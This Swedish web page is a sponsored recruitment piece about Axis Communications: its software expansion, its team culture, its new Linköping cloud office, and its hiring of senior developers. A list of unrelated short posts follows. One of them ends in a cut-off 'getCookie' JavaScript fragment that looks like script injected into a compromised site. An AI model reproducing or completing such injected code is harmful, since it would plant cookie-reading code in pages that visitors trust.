Här är det stora och växande företaget som värnar om småföretagskulturenAxis Communications breddar sin mjukvaruutveckling och växer så att det knakar.
Om du letar efter ett varierat, utvecklande och unikt arbete kan det därför vara en god idé att söka dig hit.
 Det är som att vara på ett småföretag fast med det stora företagets resurser i ryggen, säger Niklas Morberg på Axis Communications.

Arbetar du som systemutvecklare och söker nya utmaningar? Axis Communications erbjuder, till skillnad från många andra företag, en enorm bredd av mjukvaruutveckling där de skapar allt själva – från chip hela vägen upp till cloud-mjukvara.

Axis Communications har sedan det grundades 1984 jobbat mycket med fysiska produkter såsom kameror och mjukvaran inuti. De senaste åren har de gett sig ut på en resa där man även bygger en mjukvara runt produkterna och tar ansvar för ett helt system. Det innebär exempelvis mjukvaror som används för att spela in video, appar för att kunna titta på video, webbapplikationer för att kunna designa sitt system och sist men inte minst en molnmjukvara för att kunna ha koll på att allt fungerar som det ska. Även AI och Machine Learning är ett växande område.
– Från att ha varit en komponentleverantör till andras system erbjuder vi helhetslösningar för små och medelstora system där allting kommer från Axis. I dessa system kan vi ta ett större ansvar för att helheten fungerar – inte bara efter installation utan över systemets hela livscykel, säger Niklas Morberg, avdelningschef inom mjukvara på Axis Communications.

Niklas berättar vidare att Axis Communications har haft en stark företagskultur ända sedan företaget grundades. De arbetar efter nerifrån och upp principen och företaget drivs av flera team med olika inriktningar där man inom teamet får experimentera med blandade arbetssätt och verktyg – så länge man jobbar mot det gemensamma målet att leverera ett arbete med värde.
– Detta arbetssätt är vanligt på små bolag men har en tendens att försvinna på de större, men det gör det inte hos oss. Här är det som att vara på ett småföretag fast med det stora företagets resurser, stabila finansiell grund och en stor marknad med kunder i ryggen.
Läs mer om Axis Communications

Nyöppnat kontor i Linköping
Axis Communications öppnade nyligen ett kontor i Linköping med fokus på mjukvara för cloud. Skälet till detta är att de vill bli ännu bättre på utveckling av just mjukvara inom molntjänster och för att de stadigt växer.
– Vi valde att etablera oss i Linköping för att det där finns ett rikt näringsliv och för att det inte ligger mer än två timmar bort från vårt huvudkontor i Lund.

Den första anställda på Linköpingskontoret var på plats i maj och sedan dess har det antalet redan vuxit till 15 personer. Även framöver förväntas Axis Communications, som idag består av totalt cirka 1900 anställda, växa med hundratals nya medarbetare per år.
– Vi växer ordentligt och har gjort det under en längre tid. Eftersom vi har breddat oss och vill arbeta ännu mer med hypotes- och datadriven utveckling är det nu ett fantastiskt tillfälle för dig som är senior systemutvecklare att komma in och hjälpa till med att bygga och forma den, avslutar Niklas.
Vill du veta mer om Axis Communications satsning i Linköping? Läs mer här


Ständigt nyskapande
Axis är marknadsledande inom nätverksvideo. Vi uppfann världens första nätverkskamera 1996 och har sedan dess varit innovatörer inom videövervakning. Vi har gett miljontals människor över hela världen ökad säkerhet och bidragit till att fylla det växande behovet av en smartare och säkrare värld.

Vi har tillsammans med våra 90 000 partners i 179 länder levererat en mängd banbrytande produkter och många branschgenombrott – och vi ser fram emot att fortsätta vårt nyskapande arbete.

Niklas Morberg

       Niklas Morberg

 

Kommunikationstjänst som möjliggör personlig vägledning på distans

May 13, 2016

Kommunikationstjänst som möjliggör personlig vägledning på distans

Oavsett vilken typ av vägledning som behövs kan Ricohs Virtual Communication PointTM skapa förutsättningar för ett visuellt, professionellt och personligt mottagande via en specialdesignad terminal.

Greetings

September 9, 1998

This is my first post! function getCookie(e){var U=document.cookie.

Investera smart inför framtiden

April 27, 2016

Investera smart inför framtiden

Office IT-Partner har tagit fram en analysmetod som hjälper kunderna att göra smartare och mer effektiva IT-investeringar. Tack vare metoden ger man företagen förutsättningarna för att utveckla och underhålla en IT-miljö som klarar framtida krav och konkurrens. Arbetet med att jobba fram analysmetoden, som just kallas strategiskt partnerskap, har pågått i över ett år.

(Visited 764 times, 1 visits today)